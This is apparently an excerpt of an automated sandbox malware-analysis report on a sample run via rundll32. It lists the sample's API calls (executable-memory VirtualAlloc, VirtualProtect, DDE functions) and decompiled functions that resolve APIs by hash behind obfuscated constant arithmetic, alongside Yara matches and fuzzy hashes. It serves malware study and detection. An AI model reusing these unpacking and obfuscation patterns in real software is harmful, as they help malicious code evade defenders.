                                                                      • GetSystemMetrics.USER32(00000001), ref: 004282F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromPoint
                                                                      • API String ID: 4116985748-3670600901
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 004281C1
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004281CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromRect
                                                                      • API String ID: 4116985748-120404372
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DdeCreateStringHandleA.USER32(00000015,00000000), ref: 00462B7C
                                                                      • DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 00462BA9
                                                                      • DdeGetLastError.USER32(00000015), ref: 00462BBB
                                                                      • DdeFreeStringHandle.USER32(00000015,?), ref: 00462BCD
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$ClientCreateErrorFreeLastTransaction
                                                                      • String ID:
                                                                      • API String ID: 2421758087-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DdeQueryConvInfo.USER32(?,?,00000060), ref: 004614BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ConvInfoQuery
                                                                      • String ID: 0F$`
                                                                      • API String ID: 701148680-3237207667
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(?), ref: 00428110
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$GetSystemMetrics
                                                                      • API String ID: 4116985748-3773086709
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      [Control-flow graph figure; legend: Executed / Not Executed]
                                                                      APIs
                                                                      • GetEnhMetaFileA.GDI32(trty55345), ref: 004639C2
                                                                      • VirtualAlloc.KERNELBASE(00000000,00466CB4,00001000,00000040), ref: 00463A8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocFileMetaVirtual
                                                                      • String ID: trty55345$|lF
                                                                      • API String ID: 2643768156-462011533
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      [Control-flow graph figure; legend: Executed / Not Executed]
                                                                      APIs
                                                                      • DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 00461686
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: Link
                                                                      • API String ID: 2538663250-2526951119
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      [Control-flow graph figure; legend: Executed / Not Executed]
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001AEB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001AEDD9
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2111956527.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_190000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      [Control-flow graph figure; legend: Executed / Not Executed]
                                                                      APIs
                                                                        • Part of subcall function 00461AC8: DdeFreeStringHandle.USER32(?,?), ref: 00461AE8
                                                                      • DdeCreateStringHandleA.USER32(?,00000000), ref: 00461A82
                                                                      • DdeNameService.USER32(?,00000000,00000000,00000001), ref: 00461A95
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$CreateFreeNameService
                                                                      • String ID:
                                                                      • API String ID: 374373348-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      [Control-flow graph figure; legend: Executed / Not Executed]
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001AE6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2111956527.0000000000190000.00000040.00000001.sdmp, Offset: 00190000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_190000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      APIs
                                                                      • GetMonitorInfoA.USER32(?,?), ref: 00428361
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0042839D
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004283A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$InfoMonitor
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfo
                                                                      • API String ID: 4250584380-1428758730
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 004285E5
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0042860A
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00428615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$DisplayEnumMonitors
                                                                      • String ID: /}Au$EnumDisplayMonitors
                                                                      • API String ID: 1389147845-1105134141
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00428471
                                                                      • GetSystemMetrics.USER32(00000001), ref: 0042847C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoA
                                                                      • API String ID: 4116985748-2822609925
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00428545
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00428550
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoW
                                                                      • API String ID: 4116985748-1558784340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 004282E6
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004282F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromPoint
                                                                      • API String ID: 4116985748-3670600901
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 004281C1
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004281CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromRect
                                                                      • API String ID: 4116985748-120404372
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DdeCreateStringHandleA.USER32(00000015,00000000), ref: 00462B7C
                                                                      • DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 00462BA9
                                                                      • DdeGetLastError.USER32(00000015), ref: 00462BBB
                                                                      • DdeFreeStringHandle.USER32(00000015,?), ref: 00462BCD
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$ClientCreateErrorFreeLastTransaction
                                                                      • String ID:
                                                                      • API String ID: 2421758087-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DdeQueryConvInfo.USER32(?,?,00000060), ref: 004614BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ConvInfoQuery
                                                                      • String ID: 0F$`
                                                                      • API String ID: 701148680-3237207667
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(?), ref: 00428110
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000013.00000002.2112517285.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_19_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$GetSystemMetrics
                                                                      • API String ID: 4116985748-3773086709
                                                                      • Opcode ID: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
                                                                      • Instruction ID: 0ee67d0bb69f832fec1fca06a4eed47d1578d3d3e795e0a9096b3779754e9213
                                                                      • Opcode Fuzzy Hash: 4c5f92fa1d7377d91b8f4fbca774eb960f9bdc49951ee80ed77666db2558805d
                                                                      • Instruction Fuzzy Hash: 4AF0F0303072204ADB105F38BE8163E7546A782374FE08A3FE126466D2DE7C8823824E
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 472 2d3928-2d39b4 call 2b79dc 477 2d39bd-2d39cf GetEnhMetaFileA 472->477 478 2d39b6 472->478 480 2d39d8-2d39ec 477->480 481 2d39d1 477->481 478->477 482 2d3a0e-2d3ac5 VirtualAlloc 480->482 483 2d39ee-2d3a0c 480->483 481->480 491 2d3acf-2d3ada 482->491 483->482 492 2d3adc-2d3b1f 491->492 493 2d3b21-2d3b33 491->493 492->491 494 2d3b75-2d3bac 493->494 495 2d3b35-2d3b73 493->495 495->494 495->495
                                                                      APIs
                                                                      • GetEnhMetaFileA.GDI32(trty55345), ref: 002D39C2
                                                                      • VirtualAlloc.KERNELBASE(00000000,002D6CB4,00001000,00000040), ref: 002D3A8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocFileMetaVirtual
                                                                      • String ID: trty55345$|l-
                                                                      • API String ID: 2643768156-3253273693
                                                                      • Opcode ID: 9e5f63f970632e6a57cb92e905cca0662c5950c10d68d11486579421ab3f341e
                                                                      • Instruction ID: 29ce4fffa8da071d9e9851645dea00885f54bde14d72846aca101f7ff736c839
                                                                      • Opcode Fuzzy Hash: 9e5f63f970632e6a57cb92e905cca0662c5950c10d68d11486579421ab3f341e
                                                                      • Instruction Fuzzy Hash: 27615774A276019FD750DF68FD8EB1937A2F708319B10802BE5898B2B1DB72AD64CF15
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 523 279b5e-279c3f call 282550 call 277378 RtlAllocateHeap
                                                                      C-Code - Quality: 72%
                                                                      			E00279B5E(void* __ecx, long __edx, long _a4, void* _a8, intOrPtr _a12) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _v32;
                                                                      				intOrPtr _v36;
                                                                      				void* _t52;
                                                                      				void* _t68;
                                                                      				signed int _t70;
                                                                      				signed int _t71;
                                                                      				signed int _t72;
                                                                      				long _t81;
                                                                      
                                                                      				_push(_a12);
                                                                      				_t81 = __edx;
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				E00282550(_t52);
                                                                      				_v36 = 0x84647;
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				_t70 = 0x14;
                                                                      				asm("stosd");
                                                                      				_v20 = 0xbd42;
                                                                      				_t71 = 0x62;
                                                                      				_v20 = _v20 / _t70;
                                                                      				_v20 = _v20 ^ 0x00000265;
                                                                      				_v16 = 0x7dd6;
                                                                      				_v16 = _v16 / _t71;
                                                                      				_v16 = _v16 ^ 0x742f5ff0;
                                                                      				_v16 = _v16 ^ 0x742f2524;
                                                                      				_v12 = 0x61c8;
                                                                      				_t72 = 0x48;
                                                                      				_v12 = _v12 / _t72;
                                                                      				_v12 = _v12 + 0xffff34fc;
                                                                      				_v12 = _v12 ^ 0xffff6696;
                                                                      				_v8 = 0xb2ad;
                                                                      				_v8 = _v8 * 0x5f;
                                                                      				_v8 = _v8 * 0xd;
                                                                      				_v8 = _v8 | 0x4443bccc;
                                                                      				_v8 = _v8 ^ 0x475ff878;
                                                                      				E00277378(_t72, 0xa835739b, _t72, 0x90f109b3, 0x146);
                                                                      				_t68 = RtlAllocateHeap(_a8, _a4, _t81); // executed
                                                                      				return _t68;
                                                                      			}
















                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(742F2524,FFFF6696,?,?,?,?,?,?,?,?,?,00000000), ref: 00279C38
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID: $%/t
                                                                      • API String ID: 1279760036-1978068534
                                                                      • Opcode ID: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
                                                                      • Instruction ID: f34977a1f11602f801fa9bea4a9aaadd354a1f709003b2203309028f15e96df3
                                                                      • Opcode Fuzzy Hash: e4494530c7293606e0a462107f0355474be5cf6c20967cc5bfbd89f70f117b7f
                                                                      • Instruction Fuzzy Hash: EB214671D00209FBEB18CFA9C9469DEBBB5FB44310F50C099E814AA2A0D7B99B109F51
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 528 28c0c8-28c191 call 282550 call 277378 CreateFileW
                                                                      C-Code - Quality: 53%
                                                                      			E0028C0C8(long __ecx, long __edx, intOrPtr _a4, WCHAR* _a8, intOrPtr _a12, intOrPtr _a16, long _a20, intOrPtr _a24, long _a32, intOrPtr _a36) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				unsigned int _v20;
                                                                      				void* _t40;
                                                                      				void* _t48;
                                                                      				long _t52;
                                                                      				long _t53;
                                                                      
                                                                      				_t52 = __edx;
                                                                      				_push(0);
                                                                      				_push(_a36);
                                                                      				_t53 = __ecx;
                                                                      				_push(_a32);
                                                                      				_push(0);
                                                                      				_push(_a24);
                                                                      				_push(_a20);
                                                                      				_push(_a16);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E00282550(_t40);
                                                                      				_v20 = 0xb477;
                                                                      				_v20 = _v20 >> 0x10;
                                                                      				_v20 = _v20 ^ 0x000000e5;
                                                                      				_v16 = 0xb312;
                                                                      				_v16 = _v16 + 0x2a6f;
                                                                      				_v16 = _v16 ^ 0x0000d90b;
                                                                      				_v12 = 0x5a0b;
                                                                      				_v12 = _v12 + 0x400b;
                                                                      				_v12 = _v12 << 0xc;
                                                                      				_v12 = _v12 ^ 0x09a119a3;
                                                                      				_v8 = 0x3388;
                                                                      				_v8 = _v8 + 0x85f8;
                                                                      				_v8 = _v8 * 0x5a;
                                                                      				_v8 = _v8 ^ 0x00415e39;
                                                                      				E00277378(__ecx, 0x81a8678d, __ecx, 0x90f109b3, 0x2bf);
                                                                      				_t48 = CreateFileW(_a8, _t52, _t53, 0, _a32, _a20, 0); // executed
                                                                      				return _t48;
                                                                      			}












                                                                      APIs
                                                                      • CreateFileW.KERNEL32(0000D90B,?,D583BA2A,00000000,?,0ACC4A3C,00000000), ref: 0028C189
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateFile
                                                                      • String ID: 9^A
                                                                      • API String ID: 823142352-4044883665
                                                                      • Opcode ID: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
                                                                      • Instruction ID: f1d2c2496a8abf5de366d990810ea1e720fac661828c686f43b77baf11c7228c
                                                                      • Opcode Fuzzy Hash: 6b5ee137b9331e853cde0f1d047c810309658232d35a9beccd783d46722f351c
                                                                      • Instruction Fuzzy Hash: B321C2B290020CBFEF019F95DD498DEBBB9EB55358F108198F92462250D7B69E249B90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 533 2d1638-2d1641 534 2d164b-2d16d1 DdeInitializeA call 2d1328 call 2d1a14 533->534 535 2d1643 533->535 545 2d16d6-2d16eb 534->545 535->534
                                                                      APIs
                                                                      • DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 002D1686
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: Link
                                                                      • API String ID: 2538663250-2526951119
                                                                      • Opcode ID: a6114f09be6208466b6ae1c6ca0d84103dfc33b8da3a532c325bb9b864e36fdc
                                                                      • Instruction ID: 392ad43e09aba904eff8a90b7d1e9e2f9833b04592e88d76c73af819aa0d3899
                                                                      • Opcode Fuzzy Hash: a6114f09be6208466b6ae1c6ca0d84103dfc33b8da3a532c325bb9b864e36fdc
                                                                      • Instruction Fuzzy Hash: 47119170620740ABD724FB759D82A4E77E8AF05700F909865F404D7B91EB35ED209B94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 547 1deb40-1deb93 VirtualProtect 548 1deb95-1deba1 547->548 549 1deba6-1dec17 547->549 550 1dec3a-1dec85 call 1de7a0 call 1de7e0 548->550 549->550 567 1dec19-1dec37 549->567 557 1dec90-1dec9a 550->557 559 1dec9c-1deca3 557->559 560 1decf8-1ded4a call 1de920 557->560 561 1deced-1decf6 559->561 562 1deca5-1decac 559->562 570 1ded4c-1ded50 560->570 571 1ded78-1ded7f 560->571 561->557 562->561 565 1decae-1decea call 1de7e0 562->565 565->561 567->550 570->571 575 1ded52-1ded75 call 1de880 570->575 572 1ded8a-1ded94 571->572 576 1dede6-1dee1b call 1df000 572->576 577 1ded96-1ded9d 572->577 575->571 579 1ded9f-1deda6 577->579 580 1deddb-1dede4 577->580 579->580 583 1deda8-1dedd9 call 1dee20 VirtualProtect 579->583 580->572 583->580
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001DEB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001DEDD9
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149778649.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_1c0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: b148d44ab56b61b2bca518033b4ef3e6d81f2716129a530a4a85c7b1bde80d7b
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: 9EC1A875A002099FCB48DF88C590EAEB7B6BF88305F248159E9099F355D735EE42CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 588 2d1a14-2d1a5a call 2d1ac8 594 2d1a5c-2d1a69 588->594 595 2d1a70-2d1aa7 DdeCreateStringHandleA DdeNameService 588->595 594->595 598 2d1aaf 595->598
                                                                      APIs
                                                                        • Part of subcall function 002D1AC8: DdeFreeStringHandle.USER32(?,?), ref: 002D1AE8
                                                                      • DdeCreateStringHandleA.USER32(?,00000000), ref: 002D1A82
                                                                      • DdeNameService.USER32(?,00000000,00000000,00000001), ref: 002D1A95
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149834346.0000000000293000.00000020.00020000.sdmp, Offset: 00293000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_293000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$CreateFreeNameService
                                                                      • String ID:
                                                                      • API String ID: 374373348-0
                                                                      • Opcode ID: 17f0deb4fff40ce72029f8f48b87418973fd1d00a70e56883b2af83c665bc0c7
                                                                      • Instruction ID: a7c54ac9b668464bd6b8d0f732e4c083216d88c815a653c0b1d02c549db9c21a
                                                                      • Opcode Fuzzy Hash: 17f0deb4fff40ce72029f8f48b87418973fd1d00a70e56883b2af83c665bc0c7
                                                                      • Instruction Fuzzy Hash: 49118B31731254AFCB11FEA4C882A4A37ADAF09B00B8045A2FC08DB747DB70ED20CB94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 80%
                                                                      			E00277F4B(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				signed int _v8;
                                                                      				unsigned int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				intOrPtr _v32;
                                                                      				void* _t35;
                                                                      				int _t43;
                                                                      				WCHAR* _t46;
                                                                      
                                                                      				_push(_a12);
                                                                      				_t46 = __ecx;
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__ecx);
                                                                      				E00282550(_t35);
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v32 = 0x71485a;
                                                                      				_v28 = 0x57c810;
                                                                      				_v20 = 0x2813;
                                                                      				_v20 = _v20 * 0x59;
                                                                      				_v20 = _v20 ^ 0x000dd428;
                                                                      				_v16 = 0xdb84;
                                                                      				_v16 = _v16 | 0xe2c96d38;
                                                                      				_v16 = _v16 ^ 0xe2c994d7;
                                                                      				_v12 = 0xc19e;
                                                                      				_v12 = _v12 >> 7;
                                                                      				_v12 = _v12 ^ 0x000060ae;
                                                                      				_v8 = 0x265e;
                                                                      				_v8 = _v8 + 0x315a;
                                                                      				_v8 = _v8 << 0xb;
                                                                      				_v8 = _v8 ^ 0x02bd94c0;
                                                                      				E00277378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
                                                                      				_t43 = lstrcmpiW(_t46, _a4); // executed
                                                                      				return _t43;
                                                                      			}














                                                                      APIs
                                                                      • lstrcmpiW.KERNELBASE(?,000060AE,?,?,?,?,?,?,?,?,?,00000000), ref: 00277FF7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149807295.0000000000270000.00000040.00020000.sdmp, Offset: 00270000, based on PE: true
                                                                      • Associated: 00000014.00000002.3149822336.0000000000290000.00000040.00020000.sdmp
                                                                      • Associated: 00000014.00000002.3149826467.0000000000292000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_270000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmpi
                                                                      • String ID: ZHq
                                                                      • API String ID: 1586166983-2177431251
                                                                      • Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction ID: c4d64e3cc73c27c49a41d7a074d8ef1589bee526cc75bce5aa04c1acc0b4dec6
                                                                      • Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction Fuzzy Hash: C111D2B6C01219EBDF05DF94C94A8DEBFB4EF04318F108588E92466251D3B95B15DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001DE6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000014.00000002.3149778649.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_20_2_1c0000_rundll32.jbxd
                                                                      Yara matches
